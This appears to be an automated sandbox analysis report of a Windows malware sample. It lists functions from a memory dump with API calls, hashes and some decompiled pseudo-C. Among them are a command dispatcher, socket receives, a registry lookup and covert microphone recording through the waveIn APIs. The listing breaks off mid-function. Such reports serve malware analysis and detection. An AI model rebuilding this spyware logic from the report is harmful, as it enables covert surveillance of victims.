                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402149, Relevance: 16.6, APIs: 11, Instructions: 75networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                        • malloc.MSVCRT ref: 00402175
                                        • recv.WS2_32(0041BE70,00000000,000003E8,00000000), ref: 00402186
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                          • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                          • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                          • Part of subcall function 0040221E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                          • Part of subcall function 0040221E: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
                                          • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                          • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                          • Part of subcall function 0040221E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                          • Part of subcall function 0040221E: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                          • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                          • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                          • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6F5E5DF0), ref: 00402302
                                          • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                          • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                          • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                          • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                          • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                          • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                        • free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??1?$basic_string@V01@$??0?$basic_string@??4?$basic_string@$D@1@@$??9std@@?substr@?$basic_string@D@2@@0@V12@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?length@?$basic_string@?size@?$basic_string@Y?$basic_string@freemallocrecv
                                        • String ID:
                                        • API String ID: 2200674315-0
                                        • Opcode ID: 533559aab0e3dcf38d7224a0014533e596ea9eed5f72da431cbdb498b9f83fa6
                                        • Instruction ID: 77ffb52b31aa9a22c106954051cf48487ac881783d2d7cd2d5b7dec6e0024f6e
                                        • Opcode Fuzzy Hash: 533559aab0e3dcf38d7224a0014533e596ea9eed5f72da431cbdb498b9f83fa6
                                        • Instruction Fuzzy Hash: 0221443250050DEBCB15EBA0DE49EDEB7B9FF94745B104029E902B21D1DBB56A05CB14
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004124BE, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                        • time.MSVCRT ref: 004124E5
                                        • srand.MSVCRT ref: 004124F2
                                        • rand.MSVCRT ref: 00412506
                                        • rand.MSVCRT ref: 0041251A
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                        Strings
                                        • abcdefghijklmnopqrstuvwxyz, xrefs: 004124D5
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@rand$??1?$basic_string@D@1@@V01@V01@@Y?$basic_string@srandtime
                                        • String ID: abcdefghijklmnopqrstuvwxyz
                                        • API String ID: 3357298394-1277644989
                                        • Opcode ID: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                        • Instruction ID: 712daf16f8b1022a6d974ed1f73c2a3049aadf137e9a4f533f5eb28a92ccc556
                                        • Opcode Fuzzy Hash: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                        • Instruction Fuzzy Hash: F211A57754021DEBCB04EBA1ED49AEE7BB9EB80361F104026FD01E71D0DA759945CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040B95B, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                          • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                          • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                          • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                          • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                          • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                          • Part of subcall function 0040B9E8: RegOpenKeyExW.ADVAPI32(80000001,0040B9BA,00000000,00000002,0040B9BA,?,0040B9BA,80000001,00000000), ref: 0040B9F9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??1?$basic_string@$??0?$basic_string@$?begin@?$basic_string@?c_str@?$basic_string@D@1@@$?end@?$basic_string@?length@?$basic_string@G@1@@OpenV01@@
                                        • String ID: origmsc
                                        • API String ID: 643209241-68016026
                                        • Opcode ID: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                        • Instruction ID: bc2c983ee8b044bee8b0063c187639ee25001bfa26dad0cec207db0dad549837
                                        • Opcode Fuzzy Hash: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                        • Instruction Fuzzy Hash: 9111B17280050DEFCF04EFE0ED598DE77B9EA482557104025F912D31A0EB71AA59CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041290A, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 40COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,6F60CB60,?,?,0041225E,?), ref: 00412919
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
                                        • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,0041225E,?), ref: 0041296C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@V01@@$?find@?$basic_string@?length@?$basic_string@?replace@?$basic_string@G@1@@V12@
                                        • String ID: ^"A
                                        • API String ID: 1083762089-1057680782
                                        • Opcode ID: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                        • Instruction ID: 92156a76a3fbabd4be7b0d6bbce5c3b04c59df92facb318773be45834bd60316
                                        • Opcode Fuzzy Hash: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                        • Instruction Fuzzy Hash: C201083650051EEFCF049F64EC489ED3BB8FB84355B048564FC16972A0EB70AA55CF44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00411C4C, Relevance: 15.1, APIs: 10, Instructions: 108COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 15%
                                        			E00411C4C(void* __eflags, intOrPtr _a4) {
				char _v20;
				void* _v36;
				char _v52;
				int _t21;
				signed int _t35;
				void* _t39;
				void* _t45;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				void* _t72;
				void* _t75;

				_t75 = __eflags;
				_t67 = _a4;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t67 + 0x18);
				_t21 = SetEvent( *(_t67 + 0x28));
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				_t71 = _t69;
				_t45 = _t71;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(_t75,  &_v20,  &_v52,  &E0041B310,  &_v52, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t72 = _t71 + 0x24;
				_t61 =  *_t21 - 0x61;
				if(_t61 == 0) {
					_push(E0040180C( &_v20, __eflags, 2));
					_push(E0040180C( &_v20, __eflags, 1));
					_push(E0040180C( &_v20, __eflags, 0));
					_push(_t72 - 0x10);
					E00411D8A(E00412881(_t29));
				} else {
					_t62 = _t61 - 0x3d;
					if(_t62 == 0) {
						E00411A24(_t45);
					} else {
						_t63 = _t62 - 4;
						if(_t63 == 0) {
							_t35 = E0040180C( &_v20, __eflags, 0);
							__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
							__eflags =  *_t35;
							E00411B59(E0040180C( &_v20,  *_t35, 1), _t35 & 0xffffff00 | __eflags != 0x00000000);
						} else {
							_t64 = _t63 - 3;
							if(_t64 == 0) {
								_t39 =  *0x41c1d4;
								__eflags = _t39;
								if(_t39 != 0) {
									SetEvent(_t39);
								}
							} else {
								_t65 = _t64 - 1;
								if(_t65 == 0) {
									 *0x41c1d2 = 1;
								} else {
									if(_t65 == 1) {
										 *0x41c1d3 = 1;
									}
								}
							}
						}
					}
				}
				E004017DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}




















                                        0x00411c4c
                                        0x00411c53
                                        0x00411c5e
                                        0x00411c6d
                                        0x00411c72
                                        0x00411c8a
                                        0x00411c9a
                                        0x00411ca0
                                        0x00411ca6
                                        0x00411ca9
                                        0x00411cb3
                                        0x00411cb8
                                        0x00411cbb
                                        0x00411cbe
                                        0x00411d3c
                                        0x00411d47
                                        0x00411d57
                                        0x00411d58
                                        0x00411d60
                                        0x00411cc0
                                        0x00411cc0
                                        0x00411cc3
                                        0x00411d2b
                                        0x00411cc5
                                        0x00411cc5
                                        0x00411cc8
                                        0x00411d03
                                        0x00411d0a
                                        0x00411d10
                                        0x00411d22
                                        0x00411cca
                                        0x00411cca
                                        0x00411ccd
                                        0x00411cee
                                        0x00411cf3
                                        0x00411cf5
                                        0x00411cf8
                                        0x00411cf8
                                        0x00411ccf
                                        0x00411ccf
                                        0x00411cd0
                                        0x00411ce5
                                        0x00411cd2
                                        0x00411cd3
                                        0x00411cd9
                                        0x00411cd9
                                        0x00411cd3
                                        0x00411cd0
                                        0x00411ccd
                                        0x00411cc8
                                        0x00411cc3
                                        0x00411d6b
                                        0x00411d73
                                        0x00411d7c
                                        0x00411d87

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411C5E
                                        • SetEvent.KERNEL32(?), ref: 00411C6D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00411C72
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6F5E5DF0), ref: 00411C8A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00411C9A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411CA9
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • SetEvent.KERNEL32(?), ref: 00411CF8
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000,00000000), ref: 00411D0A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D73
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D7C
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?substr@?$basic_string@Event$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@A?$basic_string@D@1@@V01@
                                        • String ID:
                                        • API String ID: 3236006214-0
                                        • Opcode ID: 76bb0f9787f4f843399319169ef794d69e049009073b19e53c3a0fe976d13f89
                                        • Instruction ID: c36b53e32b237951d30ffea7710e320f728efbc531e2b869315b9cf17b3ebb74
                                        • Opcode Fuzzy Hash: 76bb0f9787f4f843399319169ef794d69e049009073b19e53c3a0fe976d13f89
                                        • Instruction Fuzzy Hash: 5431D872A502089FDB14FBB5EC4AAFE7778FF54300F00442AE502A31F1EA786984CB59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401519, Relevance: 15.1, APIs: 10, Instructions: 66COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 47%
                                        			E00401519(WCHAR* __eax, void* __eflags) {
				char* _t4;
				signed int _t5;
				CHAR* _t10;
				signed int _t11;
				signed int _t19;
				signed int _t20;
				intOrPtr* _t26;
				void* _t27;

				_t27 = __eflags;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				CreateDirectoryW(__eax, 0);
				0x41b218->wFormatTag = 1;
				 *0x41b21a = 1;
				 *0x41b21c = 0x1f40;
				 *0x41b226 = 8;
				 *0x41b220 = 0x1f40;
				 *0x41b224 = 1;
				 *0x41b228 = 0;
				_t4 = E0040180C(0x41bcb0, _t27, 0x24);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t5 = atoi(_t4);
				_t19 =  *0x41b21c; // 0x0
				 *_t26 = 0x30008;
				_t20 = _t19 * _t5 * 0x3c;
				 *0x41b1d0 = _t20;
				 *0x41b1d8 = (( *0x41b226 & 0x0000ffff) >> 3) * _t20;
				_t10 = waveInOpen(0x41b210, 0xffffffff, 0x41b218, E00401640, 0, ??);
				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d8);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				0x41b1a0->lpData = _t10;
				_t11 =  *0x41b1d8; // 0x0
				 *0x41b1a4 = _t11;
				 *0x41b1a8 = 0;
				 *0x41b1ac = 0;
				 *0x41b1b0 = 0;
				 *0x41b1b4 = 0;
				waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
				waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
				waveInStart( *0x41b210);
				return 0;
			}











                                        0x00401519
                                        0x00401523
                                        0x0040152a
                                        0x0040153c
                                        0x00401545
                                        0x0040154e
                                        0x00401553
                                        0x0040155c
                                        0x00401561
                                        0x0040156a
                                        0x00401571
                                        0x00401578
                                        0x0040157f
                                        0x00401588
                                        0x0040158e
                                        0x00401595
                                        0x004015b7
                                        0x004015bd
                                        0x004015c2
                                        0x004015d5
                                        0x004015dd
                                        0x004015eb
                                        0x004015f0
                                        0x004015fb
                                        0x00401600
                                        0x00401606
                                        0x0040160c
                                        0x00401612
                                        0x00401618
                                        0x00401627
                                        0x00401633
                                        0x0040163d

                                        APIs
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00401523
                                        • CreateDirectoryW.KERNEL32(00000000), ref: 0040152A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000024), ref: 00401578
                                        • atoi.MSVCRT ref: 0040157F
                                        • waveInOpen.WINMM(0041B210,000000FF,0041B218,00401640,00000000), ref: 004015C2
                                        • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60 ref: 004015D5
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004015DD
                                        • waveInPrepareHeader.WINMM(0041B1A0,00000020), ref: 00401618
                                        • waveInAddBuffer.WINMM(0041B1A0,00000020), ref: 00401627
                                        • waveInStart.WINMM ref: 00401633
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@D@2@@std@@D@std@@$?resize@?$basic_string@BufferCreateDirectoryG@2@@std@@G@std@@HeaderOpenPrepareStartatoi
                                        • String ID:
                                        • API String ID: 1097200658-0
                                        • Opcode ID: f20ee38416db81f306279cb0c28f4eeb0498ba6ae41a5029cc8ee80026fbf496
                                        • Instruction ID: a0367b72af85d797f208d99e464840de03d8dffdaa75739b080142e4d14956f2
                                        • Opcode Fuzzy Hash: f20ee38416db81f306279cb0c28f4eeb0498ba6ae41a5029cc8ee80026fbf496
                                        • Instruction Fuzzy Hash: 59210571640204EBC3019FA5FC5CAEE7BA5FB88391B01C5BAE915CA3B0D7B854858BDC
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040F153, Relevance: 15.1, APIs: 10, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F164
                                        • SetEvent.KERNEL32(?), ref: 0040F16D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F176
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6F5E5DF0), ref: 0040F18E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040F19E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F1AD
